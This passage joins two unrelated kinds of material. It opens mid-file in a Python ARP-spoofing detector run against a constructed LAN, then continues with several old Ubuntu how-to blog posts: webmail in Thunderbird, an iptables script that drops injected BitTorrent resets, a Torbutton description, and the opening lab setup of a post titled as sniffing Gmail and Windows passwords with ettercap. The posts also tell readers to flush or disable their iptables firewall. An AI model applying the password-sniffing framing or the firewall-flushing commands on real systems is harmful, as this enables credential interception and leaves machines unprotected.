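        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac          # first sighting: learn it
            return None
        if known != mac:
            alert = f"{ip} is {known} but a reply to {pkt['target_ip']} claims it is {mac}"
            self.alerts.append(alert)        # keep the trusted entry, do not overwrite
            return alert
        return None


# Constructed LAN: router .1, victim .10, attacker .77 (all addresses made up).
GATEWAY, VICTIM, ATTACKER = "00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"


def run_scenario():
    """Replay one genuine reply, then the two-sided poisoning ettercap performs."""
    watch = ArpWatch({"192.168.1.1": GATEWAY, "192.168.1.10": VICTIM})
    frames = [
        build_arp(ARP_REPLY, GATEWAY, "192.168.1.1", VICTIM, "192.168.1.10"),    # genuine
        build_arp(ARP_REPLY, ATTACKER, "192.168.1.1", VICTIM, "192.168.1.10"),   # "I am the router", to victim
        build_arp(ARP_REPLY, ATTACKER, "192.168.1.10", GATEWAY, "192.168.1.1"),  # "I am the victim", to router
    ]
    for f in frames:
        watch.observe(f)
    return watch


if __name__ == "__main__":
    for a in run_scenario().alerts:
        print(a)
```

On a real interface the frames would come from a raw socket or libpcap instead of build_arp; the watcher logic is unchanged. Static ARP entries for the gateway on the clients, or port security / dynamic ARP inspection on a managed switch, are the preventive counterparts to this detection.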
Howto: Access Web Based email through Thunderbird
Here is a solution for the web-based email services that do not offer POP3/SMTP, or that charge for it: this extension acts like a browser and presents the mail to Thunderbird over POP3/SMTP/IMAP.
Below is the list of web-based email services this extension supports, followed by an easy install guide to get started; I used Yahoo as the example.
Here are the supported web-based services:
Hotmail
Hotmail.com Hotmail.fr Hotmail.it Hotmail.de Hotmail.co.uk MSN.com MSN.co.uk
Yahoo
Yahoo.com Yahoo.com.cn Yahoo.com.hk Yahoo.com.au Yahoo.com.sg Yahoo.com.ar Yahoo.co.uk Yahoo.co.jp Yahoo.it Yahoo.ie Yahoo.es Yahoo.se Yahoo.fr Yahoo.de Yahoo.ca Talk21.com BTinternet.com BTopenworld.com
Lycos
Lycos.co.uk Lycos.it Lycos.es Lycos.de Lycos.at Lycos.nl Caramail.com
MailDotCom
Mail.com Email.com Journalism.com Iname.com scientist.com earthling.net techie.com usa.com post.com witty.com whoever.com writeme.com unforgettable.com teacher.com
Gmail
gmail.com
Libero
libero.it iol.it blu.it
AOL
aol.com aim.com netscape.com netscape.net
OK, now let's get to the good stuff and set this up!
First let's grab the Thunderbird email client; click here to have apt install it from Firefox, or simply do:
sudo apt-get install thunderbird
Now that it's installed, let's grab a few extensions for Thunderbird.
Right click and save the Webmail extension to your desktop:
WebMail Extension
Open up Thunderbird, click Tools->Add-ons->Install and select the extension you saved to the desktop.
Once it is installed, restart Thunderbird and grab the add-on's add-on from this page.
Here is the Yahoo extension; right click, Save As:
Yahoo-1.3.2
Open up Thunderbird, click Tools->Add-ons->Install and select the optional extension you saved to the desktop.
Restart Thunderbird.
Now go to the first extension, the Webmail extension, and click on Preferences: there you should see the servers running.
Change the port numbers so they are above 1024 (unprivileged ports, so the extension can bind them without root; be sure to change the ports in your server settings too when you create the account), and then start the POP and SMTP services.
Now add an account and select "Webmail". Your username is your full Yahoo email address. (The port settings are probably already correct.)
Don't download your mail yet!
Go to Extra, Addons, Webmail, Preferences, Domains
There you should see a list of some Hotmail domains. If you don't, the servers are probably not running (or your firewall is blocking something).
If the servers are running in the Webmail extension but you still can't see the domains, then your WebmailData directory has incorrect permissions. Give your user read, write and execute permission on the WebmailData directory. The original guide does this with
chmod 700 ~
which actually changes the permissions of your whole home directory; running the same chmod on the WebmailData directory itself (look for it under your Thunderbird profile directory) is the targeted fix.
If you still have this problem, try disabling your firewall. As root:
iptables -F
Be aware that this flushes every iptables rule on the machine, not just the one in the way; restore your normal rules afterwards.
If you don't have this list, you will get the error "undefined is a unsupported domain" when you try to download your email (check your domains and servers as described above).
Otherwise go to the next step.
Click on the Preferences button for the Webmail-Yahoo extension now. Your account will normally already be selected. For Yahoo mail select "Yahoo (BETA)".
Download your mail; it will ask for a password, type it in and your mail should be downloaded.
If you get "negative vibes from xxx@yahoo.com", this mostly means the extension can't understand the website. Make sure you selected Yahoo beta, and if that still doesn't solve the issue, contact the developer.
Developer's Site
Howto Search And Replace Text in files Recursively on Ubuntu Linux

I just found a new tool called regexxer; I'm sure it has been around for a while, but I just discovered it.
regexxer is a nifty GUI search/replace tool featuring Perl-style regular expressions. If you need project-wide substitution and you're tired of hacking sed command lines together, then you should definitely give it a try.
Simply:
sudo apt-get install regexxer
Fix Comcast or University BitTorrent Connection Killing on Ubuntu
I was searching the web for a fix for this screwed-up problem of Comcast and universities limiting connections with Sandvine. I have many reasons to believe Qwest and other internet service providers are going to start limiting your torrent connections, which is bullshit. BitTorrent is indeed hard on ISPs, with thousands of SYN/ACKs and TCP connections to and from your computer. I have read BANDWIDTH CHALLENGE TO PUSH LIMITS OF TECHNOLOGY and it seems bandwidth is surpassing technology and ISPs need to upgrade, but anyway, whose fault is that? Not ours; screw them!
Here is a script that drops the forged RST packets that reset your connections (the throttling works by injecting TCP resets into your BitTorrent connections; if the reset never reaches your TCP stack, the connection stays up):
1) open a terminal
2) sudo -s
3) cd /etc/init.d/
4) type cat >>bitfix
5) paste the script below, then press CTRL+D to finish writing the file:
#!/bin/sh
# Replace 6883 with your BitTorrent port
BT_PORT=6883
# Flush the existing INPUT rules (this wipes any firewall rules you already had)
iptables -F
# Apply new filters: always allow loopback
iptables -A INPUT -i lo -j ACCEPT
# Comcast BitTorrent seeding block workaround: drop any RST aimed at the
# BitTorrent port, so injected resets never reach the TCP stack
iptables -A INPUT -p tcp --dport $BT_PORT --tcp-flags RST RST -j DROP
# Let replies to connections we started (and related traffic) back in
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Accept new BitTorrent connections, TCP and UDP
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport $BT_PORT -j ACCEPT
iptables -A INPUT -m state --state NEW -m udp -p udp --dport $BT_PORT -j ACCEPT
# Reject everything else (note: this also blocks SSH and any other inbound service)
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
exit 0
6) chmod +x bitfix
7) ./bitfix
Your iptables firewall is now configured and you should have good upload speed. The rules only last until the next reboot; run the script again after every boot, or call it from /etc/rc.local so it runs automatically.
The ESTABLISHED,RELATED rule in the script (-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT) is what lets replies to your own outgoing connections back in; without it, the final REJECT rule would break ordinary browsing. Also note that the RST drop only matches resets aimed at your listening port, i.e. incoming (seeding) connections; resets injected into connections you opened yourself arrive on an ephemeral port and are not covered.
If you use Transmission or any other BitTorrent client you may have to edit the port:
Transmission uses port 9090
Credits
New torbutton Featured at Blackhat
I was just searching Google for some BlackHat PDFs and ran across a great Firefox extension that works with Tor. Here are some of the features; this is a copy/paste right from the developer's site:
About
Torbutton is a 1-click way for Firefox users to enable or disable the browser's use of Tor. It adds a panel to the statusbar that says "Tor Enabled" (in green) or "Tor Disabled" (in red). The user may click on the panel to toggle the status. If the user (or some other extension) changes the proxy settings, the change is automatically reflected in the statusbar. Some users may prefer a toolbar button instead of a statusbar panel. Such a button is included, and one adds it to the toolbar by right-clicking on the desired toolbar, selecting "Customize...", and then dragging the Torbutton icon onto the toolbar. There is an option in the preferences to hide the statusbar panel (Tools->Extensions, select Torbutton, and click on Preferences). Newer Firefoxes have the ability to send DNS resolves through the socks proxy, and Torbutton will make use of this feature if it is available in your version of Firefox.
Description of Options
The development branch of Torbutton adds several new security features to protect your anonymity from all the major threats the author is aware of. The defaults should be fine for most people, but in case you are the tweaker type, or if you prefer to try to outsource some options to more flexible extensions, here is the complete list. (In an ideal world, these descriptions should all be tooltips in the extension itself, but Firefox bugs 45375 and 218223 currently prevent this.)
FAQ
When I use Tor, Firefox is no longer filling in logins/search boxes for me. Why?
Currently, this is tied to the "Block history writes during Tor" setting. If you have enabled that setting, all formfill functionality (both saving and reading) is disabled. If this bothers you, you can uncheck that option, but both history and forms will be saved. To prevent history disclosure attacks via Non-Tor usage, it is recommended you disable Non-Tor history reads if you allow history writing during Tor.
This is a tough one. There are thousands of Firefox extensions: making a complete list of ones that are bad for anonymity is near impossible. However, here are a few examples that should get you started as to what sorts of behavior are dangerous.
Download/install here
Howto: Sniff Gmail and Windows Passwords with ettercap on Ubuntu Linux
What You Will Need
*An Ubuntu machine to perform the ettercap hackery
*A Windows machine to act as a file server (your virtual Windows XP machine will work)
*Another Windows machine to be a client (your host Windows XP machine will work)
Start Your Ubuntu Virtual Machine
1. Start your Ubuntu machine and log in as usual.
Installing ettercap
2. From the menu bar in the upper left corner of the Ubuntu desktop, click Applications, Add/Remove.
3. In the Add/Remove Applications box, in the Search field, enter ettercap and press the Enter key.
4. When the ettercap application appears, as shown below on this page, check the check box in the Application pane. In the “Apply the following changes?” box, click Apply. Enter your password when you are prom